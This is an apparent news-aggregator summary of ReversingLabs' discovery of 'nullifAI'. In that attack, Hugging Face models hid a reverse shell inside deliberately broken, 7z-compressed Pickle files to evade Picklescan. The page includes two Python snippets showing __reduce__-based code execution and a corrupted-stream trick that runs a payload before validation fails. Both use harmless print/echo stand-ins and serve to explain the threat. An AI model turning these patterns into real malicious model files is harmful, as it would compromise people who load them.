News from the AI & ML world

DeeperML

By Karlo Zanki (ReversingLabs), via Blog (Main)
Cybersecurity researchers have identified malicious machine learning (ML) models on Hugging Face, a popular platform for sharing and collaborating on ML projects. The models leverage a novel attack technique dubbed "nullifAI," which uses deliberately "broken" pickle files to evade detection. The method abuses the Pickle serialization format, which permits arbitrary Python code execution while an ML model is being deserialized. The malicious models, which resemble proof-of-concept models, were initially not flagged as unsafe by Picklescan, the security tool Hugging Face uses to screen uploaded Pickle files.
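
Why is a serialization format a code-execution vector? A minimal, harmless sketch (the class name and echoed string are illustrative, not taken from the actual samples) shows that any pickled object can instruct the deserializer to call an arbitrary function:

    import pickle

    class Malicious:
        """Harmless stand-in; the real models spawned a reverse shell."""
        def __reduce__(self):
            # pickle records the return value as "call this function with
            # these arguments", and pickle.loads() executes that call.
            import os
            return (os.system, ('echo payload ran during unpickling',))

    blob = pickle.dumps(Malicious())
    pickle.loads(blob)  # executes os.system(...); the Malicious class need
                        # not even exist on the machine that loads the blob

Loading an untrusted pickle is therefore equivalent to running untrusted code, which is why Hugging Face scans uploaded Pickle files in the first place.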

Researchers from ReversingLabs discovered two such models on Hugging Face containing malicious code. The nullifAI attack exploits two weaknesses: the Pickle files were stored in PyTorch format but compressed with 7z rather than PyTorch's default ZIP format, and a security issue in Picklescan prevented broken Pickle files from being properly scanned. The malicious payload in both cases was a platform-aware reverse shell that connects to a hard-coded IP address. The Hugging Face security team has since removed the malicious models and improved Picklescan's detection capabilities.
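
The evasion works because Pickle is a sequential opcode stream and the interpreter executes each opcode as it reads it, so a payload placed early in a deliberately broken stream runs before deserialization aborts. A rough sketch of that asymmetry, using pickletools as a stand-in for a scanner that requires a well-formed stream (Picklescan's actual failure mode differed in its details):

    import pickle
    import pickletools

    class Payload:
        """Harmless stand-in; the real payload was a reverse shell."""
        def __reduce__(self):
            return (print, ('payload executed during unpickling',))

    # Serialize the payload, then corrupt the tail of the stream.
    data = pickle.dumps(Payload())
    broken = data[:-1] + b'\xff'  # clobber the final STOP opcode

    # A whole-stream validator gives up on the corrupt stream ...
    try:
        pickletools.dis(broken)
    except Exception as e:
        print(f'validation failed: {e}')

    # ... but the payload still runs before deserialization fails.
    try:
        pickle.loads(broken)
    except Exception as e:
        print(f'unpickling failed, but only AFTER the payload ran: {e}')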

References:
  • Blog (Main): Researchers from ReversingLabs recently discovered two Hugging Face models containing malicious code. The nullifAI attack involves abusing Pickle file serialization.
  • gbhackers.com: Developers Beware! Malicious ML Models Found on Hugging Face Platform
  • The Hacker News: Malicious ML Models on Hugging Face Leverage Broken Pickle Format to Evade Detection
  • www.csoonline.com: Attackers hide malicious code in Hugging Face AI model Pickle files
  • ciso2ciso.com: Malicious ML Models on Hugging Face Exploit Novel Attack Technique – Source: www.infosecurity-magazine.com
  • cyberscoop.com: Hugging Face platform continues to be plagued by vulnerable ‘pickles’
  • Anonymous: Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
  • ciso2ciso.com: SecurityWeek - Malicious AI Models on Hugging Face Exploit Novel Attack Technique
  • Help Net Security: Researchers have spotted two machine learning (ML) models containing malicious code on Hugging Face Hub, the popular online repository for datasets and pre-trained models.
  • www.scworld.com: Security news about Hugging Face and malicious AI models
  • : The abuse of Pickle, a popular Python module that many teams use for serializing and deserializing ML model data
  • Virus Bulletin: Virus Bulletin reports on researchers from ReversingLabs discovering two Hugging Face models containing malicious code.
Classification:
  • HashTags: #HuggingFace #MaliciousML #NullifAI
  • Company: Hugging Face
  • Target: Hugging Face Users
  • Product: Hugging Face
  • Feature: Pickle Serialization
  • Malware: nullifAI reverse shell
  • Type: AI
  • Severity: Major